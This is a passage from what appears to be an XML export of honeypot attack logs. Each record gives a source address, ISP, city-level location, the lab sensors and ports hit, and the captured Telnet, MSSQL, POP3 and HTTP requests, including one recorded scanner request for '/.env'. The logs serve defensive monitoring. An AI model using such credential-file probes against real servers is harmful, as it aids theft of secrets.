    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (Industrial Layout)"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.8884"/>
    <s v="77.6387"/>
    <s v="24560"/>
    <s v="AIRTELBROADBAND-AS-AP"/>
    <s v="Bharti"/>
    <s v="consumer"/>
    <s v="ABTS (Karnataka)"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aa7:a5ea"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3022"/>
    <x v="3022"/>
    <s v="NA&amp;&amp;59-127-117-186.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-05T10:01:36"/>
    <d v="2024-12-16T15:50:12"/>
    <d v="2025-04-05T10:01:36"/>
    <n v="481"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="23&amp;&amp;NA&amp;&amp;30092&amp;&amp;52351&amp;&amp;52382"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:75ba"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3023"/>
    <x v="3023"/>
    <s v="59-127-235-146.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T10:01:23"/>
    <d v="2024-04-06T06:28:00"/>
    <d v="2025-04-05T10:01:23"/>
    <n v="701"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_LDAP_H43&amp;&amp;SMA-LAB_SOCKS5_H43&amp;&amp;SMA-LAB_SSH_H6&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTPS_H35&amp;&amp;SMA-LAB_NTP_H47&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H14"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;389&amp;&amp;1080&amp;&amp;22&amp;&amp;80&amp;&amp;443&amp;&amp;123&amp;&amp;19739&amp;&amp;44325&amp;&amp;54067&amp;&amp;63856&amp;&amp;54080&amp;&amp;23&amp;&amp;NA&amp;&amp;9100&amp;&amp;54269&amp;&amp;64624"/>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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3b7f:eb92"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3024"/>
    <x v="3024"/>
    <s v="NA&amp;&amp;114-33-25-210.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-05T10:00:59"/>
    <d v="2024-12-15T05:47:13"/>
    <d v="2025-04-05T10:00:59"/>
    <n v="426"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="23&amp;&amp;55929&amp;&amp;55947&amp;&amp;42354&amp;&amp;58348&amp;&amp;NA&amp;&amp;41973&amp;&amp;41980&amp;&amp;39630&amp;&amp;41997"/>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NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7221:19d2"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3025"/>
    <x v="3025"/>
    <s v="123-205-67-17.adsl.dynamic.seed.net.tw&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T10:00:56"/>
    <d v="2025-01-18T00:10:15"/>
    <d v="2025-04-05T10:00:56"/>
    <n v="218"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23&amp;&amp;80&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taichung City"/>
    <s v="Taichung"/>
    <s v="1668399"/>
    <s v="NA"/>
    <s v="24.1182"/>
    <s v="120.679"/>
    <s v="18049"/>
    <s v="Taiwan Infrastructure Network Technologie"/>
    <s v="TINP"/>
    <s v="residential"/>
    <s v="Digital United Inc."/>
    <s v="None"/>
    <s v="SEEDNET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7bcd:4311"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3026"/>
    <x v="3026"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T09:57:19"/>
    <d v="2025-04-05T09:57:19"/>
    <d v="2025-04-05T09:57:19"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="20"/>
    <s v="Thái Bình Province"/>
    <s v="Thành Phố Thái Bình"/>
    <s v="Thái Bình"/>
    <s v="1566346"/>
    <s v="NA"/>
    <s v="20.45"/>
    <s v="106.34"/>
    <s v="7552"/>
    <s v="VIETEL-AS-AP"/>
    <s v="Viettel"/>
    <s v="consumer"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7505:bcff"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3027"/>
    <x v="3027"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T09:33:25"/>
    <d v="2025-04-05T09:33:25"/>
    <d v="2025-04-05T09:33:25"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Mumbai Suburban"/>
    <s v="Mumbai"/>
    <s v="1275339"/>
    <s v="400001"/>
    <s v="19.076"/>
    <s v="72.8777"/>
    <s v="9829"/>
    <s v="BSNL-NIB"/>
    <s v="MTNL Mumbai"/>
    <s v="corporate"/>
    <s v="Mahanagar Telephone Nigam Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3bb8:988b"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3028"/>
    <x v="3028"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T09:22:07"/>
    <d v="2025-04-05T06:09:26"/>
    <d v="2025-04-05T09:22:07"/>
    <n v="8"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'zen.spamhaus.org': ['unknown']}"/>
    <n v="33"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="San Bernardino"/>
    <s v="Apple Valley"/>
    <s v="5324363"/>
    <s v="92308"/>
    <s v="34.4993"/>
    <s v="-117.19"/>
    <s v="5650"/>
    <s v="Frontier Communications of America, Inc."/>
    <s v="Frontier Communications Solutions"/>
    <s v="residential"/>
    <s v="FTR3 FIOS-D Apple Valley CA"/>
    <s v="2015-08-28"/>
    <s v="FCC-212"/>
    <s v="2015-08-28"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2f96:c594"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3029"/>
    <x v="3029"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T09:17:12"/>
    <d v="2025-04-05T09:13:41"/>
    <d v="2025-04-05T09:17:12"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Thane"/>
    <s v="Navi Mumbai (Reliance Corporate Park)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="19.136"/>
    <s v="73.0039"/>
    <s v="55836"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="cellular"/>
    <s v="Reliance Jio Infocomm Limited"/>
    <s v="1994-08-08"/>
    <s v="RELIANCEJIO-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:983a:6050"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3030"/>
    <x v="3030"/>
    <s v="1-171-215-176.dynamic-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-05T09:01:07"/>
    <d v="2025-04-04T09:40:33"/>
    <d v="2025-04-05T09:01:07"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1ab:d7b0"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3031"/>
    <x v="3031"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-05T09:00:51"/>
    <d v="2024-12-15T05:04:59"/>
    <d v="2025-04-05T09:00:51"/>
    <n v="299"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:mail']&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTPS_H38&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTPS_H29&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_POSTGRES_H34&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_POSTGRES_H46&amp;&amp;SMA-LAB_POSTGRES_H14&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_POSTGRES_H45&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H5&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H6&amp;&amp;SMA-LAB_POSTGRES_H29&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_POSTGRES_H24&amp;&amp;SMA-LAB_POP3_H10&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_POP3_H4&amp;&amp;SMA-LAB_POP3_H37&amp;&amp;SMA-LAB_POP3_H34&amp;&amp;SMA-LAB_POP3_H41&amp;&amp;SMA-LAB_POP3_H14&amp;&amp;SMA-LAB_POP3_H21&amp;&amp;SMA-LAB_SMB_H44&amp;&amp;SMA-LAB_POP3_H29&amp;&amp;SMA-LAB_POP3_H18&amp;&amp;SMA-LAB_POP3_H15&amp;&amp;SMA-LAB_POP3_H23&amp;&amp;SMA-LAB_POP3_H17&amp;&amp;SMA-LAB_POP3_H38&amp;&amp;SMA-LAB_POP3_H22&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_POP3_H12&amp;&amp;SMA-LAB_POP3_HC1&amp;&amp;SMA-LAB_POP3_H8"/>
    <s v="80&amp;&amp;443&amp;&amp;5432&amp;&amp;110&amp;&amp;445&amp;&amp;3306&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="SG"/>
    <s v="Singapore"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="Singapore (Jurong East)"/>
    <s v="1880252"/>
    <s v="609606"/>
    <s v="1.32773"/>
    <s v="103.746"/>
    <s v="31898"/>
    <s v="Oracle Corporation"/>
    <s v="Oracle Corporation"/>
    <s v="hosting"/>
    <s v="Oracle Corporation"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;command&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '154.93.37.45', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '66.94.127.183', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '38.54.117.64', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '194.4.48.242', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '38.60.224.106', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Host': '194.233.76.135', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Host': '194.233.76.135', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Host': '38.60.224.106', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_POP3:{'args': '/ HTTP/1.1', 'cmd': 'GET'}}&amp;&amp;{Data_POP3:{'args': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'cmd': 'accept:'}}&amp;&amp;{Data_POP3:{'args': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'cmd': 'user-agent:'}}&amp;&amp;{Data_POP3:{'args': 'en-US,en;q=0.5', 'cmd': 'accept-language:'}}&amp;&amp;{Data_POP3:{'args': '5.253.43.207:110', 'cmd': 'host:'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': ''}}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Host': '194.233.76.135', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Host': '194.233.76.135', 'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': 